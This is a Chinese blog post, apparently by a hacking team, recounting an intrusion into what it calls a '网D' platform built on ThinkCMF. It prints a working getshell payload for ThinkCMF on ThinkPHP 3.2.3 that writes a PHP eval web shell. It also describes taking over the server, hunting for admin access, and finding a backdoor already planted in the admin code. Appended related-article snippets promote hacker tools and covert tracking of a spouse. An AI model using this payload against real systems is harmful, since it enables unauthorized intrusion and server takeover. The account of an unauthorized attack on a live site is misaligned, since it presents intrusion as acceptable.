渗透小计之「竟然有人在wangle平台代码里下毒」

访客4年前黑客工具769

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

进去之后在url处构造报错

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

黑客网站免费找(在黑客网站怎么联系对方)

一、黑客网站免费盗(在黑客网站怎么联系对方)方法总结 1、请问如何找到黑客软件免费的?1月8号任务,请大家发表~~主题:2005最新整理的黑客工具百宝箱下载想做黑客的就来看看~内容:啊拉QQ大盗黑客...

阴阳师清姬典藏皮肤化烟上线时间 清姬化烟皮肤要多少钱

阴阳师清姬典藏皮肤化烟上线时间 清姬化烟皮肤要多少钱

阴阳师清姬典藏皮肤化烟什么时候上架?阴阳师手游近日曝光了清姬的典藏皮肤化烟,这款皮肤是首届百绘罗衣的获奖作品,目前已经确定了价格(108魂玉,首周88魂玉),那么清姬化烟皮肤什么时候出呢?一起来看看吧...

青岛科技大学怎么样(2020青岛科技大学本科录取详情分析)

  青岛科技大学怎么样(2020青岛科技本科录用详细信息剖析)一、学校介绍青岛科技高校,坐落于青岛,所在位置优异,是山东内一所关键本科大学,院校创立于1950年,是一因此轻工行业为主导的学校,伴随着这...

在线客服沟通工具(在线客服网)

  有别于政府部门或机关事业单位,针对众多中小型企业而言,制作企业官网的目地非常简单。是宣传策划展现企业以提高企业形象,或是宣传策划展现商品以輔助营销推广。也就是说,建立网站的目地是根据网址协助企业提...

HTML5做SEO优化的优势

都说网站优化、网站优化,既然是网站优化,那么最基础的就是从网页的代码开始,传统的html满足不了移动端的需求和PC端的效果,所以html5和CSS3出来了,不但满足了更多的需求,还给我们的优化带来了很...

怎么能实时监控定位知道老公的具体位置

    微信如今已经离不开我们的生活,通过微信我们可以与家人,...